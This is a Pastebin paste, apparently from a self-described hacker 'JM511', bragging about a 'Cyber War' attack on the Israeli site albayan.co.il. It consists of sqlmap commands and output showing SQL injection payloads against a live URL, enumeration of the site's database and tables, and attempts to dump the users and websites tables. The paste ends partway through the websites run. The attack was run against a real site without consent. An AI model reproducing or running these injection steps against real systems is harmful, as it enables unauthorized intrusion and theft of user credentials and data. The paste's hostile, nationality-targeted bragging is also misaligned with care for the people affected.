Advertisement
Islam-Hacker

Database:albayan.co.il "BY JM511"

Aug 24th, 2012
258
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.86 KB | None | 0 0
  1. Fucked Database of www.albayan.co.il
  2. Israeli Site
  3. Cyber War
  4. ======= By JM511 From Saudi Arabia ==========
  5. Follow me : @JM511
  6. Greeting to : @in3ctor
  7. ==============================================
  8.  
  9.  
  10.  
  11. available databases [2]:
  12. [*] albayan_db
  13. [*] information_schema
  14.  
  15. [16:42:21] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.albayan.co.il'
  16.  
  17. [*] shutting down at 16:42:21
  18.  
  19. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.albayan.co.il/news.php?id=307 -D albayan_db --tables
  20.  
  21. sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
  22. http://sqlmap.org
  23.  
  24. [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
  25.  
  26. [*] starting at 17:10:26
  27.  
  28. [17:10:26] [INFO] resuming back-end DBMS 'mysql'
  29. [17:10:36] [INFO] testing connection to the target url
  30. [17:11:17] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
  31. [17:11:17] [WARNING] if the problem persists please check that the provided target url is valid. If it is, you can try to rerun with the switch '--random-agent' turned on and/or proxy switches (--ignore-proxy, --proxy,...)
  32. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  33. ---
  34. Place: GET
  35. Parameter: id
  36. Type: boolean-based blind
  37. Title: AND boolean-based blind - WHERE or HAVING clause
  38. Payload: id=307 AND 1884=1884
  39.  
  40. Type: UNION query
  41. Title: MySQL UNION query (NULL) - 18 columns
  42. Payload: id=307 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a786f793a,0x504473674a6e527a4753,0x3a6e6c793a), NULL, NULL, NULL#
  43. ---
  44.  
  45. [17:11:18] [INFO] the back-end DBMS is MySQL
  46.  
  47. web application technology: PHP 5.2.17
  48. back-end DBMS: MySQL 5
  49. [17:11:18] [INFO] fetching tables for database: 'albayan_db'
  50. [17:11:20] [WARNING] reflective value(s) found and filtering out
  51. [17:11:20] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
  52. [17:11:20] [INFO] fetching number of tables for database 'albayan_db'
  53. [17:11:20] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
  54. [17:11:20] [INFO] retrieved:
  55. [17:11:31] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
  56. 1
  57. [17:12:07] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
  58. 4
  59. [17:12:19] [INFO] retrieved: adv
  60. [17:12:52] [INFO] retrieved: ca
  61. [17:13:44] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
  62. t
  63. [17:14:33] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
  64. eg
  65. [17:16:08] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
  66. ory
  67. [17:16:51] [INFO] retrieved: commet
  68. [17:18:43] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
  69. [17:19:14] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
  70. s
  71. [17:19:29] [INFO] retrieved: headlines_
  72. [17:22:59] [CRITICAL] connection timed out to the target url or proxy, sqlmap is going to retry the request
  73. [17:23:35] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
  74. categorys
  75. [17:25:32] [INFO] retrieved: headli
  76. [17:26:01] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request
  77. nes_news
  78. [17:27:02] [INFO] retrieved: poll
  79. [17:27:27] [INFO] retrieved: pollip
  80. [17:27:47] [INFO] retrieved: products
  81. [17:28:58] [INFO] retrieved: songs
  82. [17:30:01] [INFO] retrieved: swf_adv
  83. [17:30:45] [INFO] retrieved: users
  84. [17:31:38] [INFO] retrieved: video
  85. [17:32:18] [INFO] retrieved: video_menu
  86. [17:32:58] [INFO] retrieved: websites
  87. Database: albayan_db
  88. [14 tables]
  89. +---------------------+
  90. | adv |
  91. | category |
  92. | commets |
  93. | headlines_categorys |
  94. | headlines_news |
  95. | poll |
  96. | pollip |
  97. | products |
  98. | songs |
  99. | swf_adv |
  100. | users |
  101. | video |
  102. | video_menu |
  103. | websites |
  104. +---------------------+
  105.  
  106. [17:34:01] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.albayan.co.il'
  107.  
  108. [*] shutting down at 17:34:01
  109.  
  110. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.albayan.co.il/news.php?id=307 -D albayan_db -T users --dump
  111.  
  112. sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
  113. http://sqlmap.org
  114.  
  115. [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
  116.  
  117. [*] starting at 17:49:56
  118.  
  119. [17:49:56] [INFO] resuming back-end DBMS 'mysql'
  120. [17:50:06] [INFO] testing connection to the target url
  121. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  122. ---
  123. Place: GET
  124. Parameter: id
  125. Type: boolean-based blind
  126. Title: AND boolean-based blind - WHERE or HAVING clause
  127. Payload: id=307 AND 1884=1884
  128.  
  129. Type: UNION query
  130. Title: MySQL UNION query (NULL) - 18 columns
  131. Payload: id=307 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a786f793a,0x504473674a6e527a4753,0x3a6e6c793a), NULL, NULL, NULL#
  132. ---
  133.  
  134. [17:50:17] [INFO] the back-end DBMS is MySQL
  135.  
  136. web application technology: PHP 5.2.17
  137. back-end DBMS: MySQL 5
  138. [17:50:17] [INFO] fetching columns for table 'users' in database 'albayan_db'
  139. [17:50:18] [WARNING] reflective value(s) found and filtering out
  140. [17:50:18] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
  141. [17:50:18] [ERROR] unable to retrieve the columns for any table in database 'albayan_db'
  142. do you want to use common column existence check? [y/N/q] y
  143.  
  144. [17:50:21] [INFO] checking column existence using items from '/pentest/database/sqlmap/txt/common-columns.txt'
  145. [17:50:21] [INFO] adding words used on web page to the check list
  146. please enter number of threads? [Enter for 1 (current)] 9
  147.  
  148. [17:50:24] [INFO] starting 9 threads
  149. [17:50:27] [INFO] retrieved: userid
  150. [17:50:46] [INFO] retrieved: password
  151. [17:51:31] [INFO] retrieved: user
  152.  
  153. [17:55:42] [INFO] fetching entries for table 'users' in database 'albayan_db'
  154. Database: albayan_db
  155. Table: users
  156. [0 entries]
  157. +--------+------+----------+
  158. | userid | user | password |
  159. +--------+------+----------+
  160. +--------+------+----------+
  161.  
  162. [17:55:43] [INFO] table 'albayan_db.users' dumped to CSV file '/pentest/database/sqlmap/output/www.albayan.co.il/dump/albayan_db/users.csv'
  163. [17:55:43] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.albayan.co.il'
  164.  
  165. [*] shutting down at 17:55:43
  166.  
  167. root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://www.albayan.co.il/news.php?id=307 -D albayan_db -T websites --dump
  168.  
  169. sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
  170. http://sqlmap.org
  171.  
  172. [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
  173.  
  174. [*] starting at 18:08:31
  175.  
  176. [18:08:31] [INFO] resuming back-end DBMS 'mysql'
  177. [18:08:41] [INFO] testing connection to the target url
  178. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  179. ---
  180. Place: GET
  181. Parameter: id
  182. Type: boolean-based blind
  183. Title: AND boolean-based blind - WHERE or HAVING clause
  184. Payload: id=307 AND 1884=1884
  185.  
  186. Type: UNION query
  187. Title: MySQL UNION query (NULL) - 18 columns
  188. Payload: id=307 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a786f793a,0x504473674a6e527a4753,0x3a6e6c793a), NULL, NULL, NULL#
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement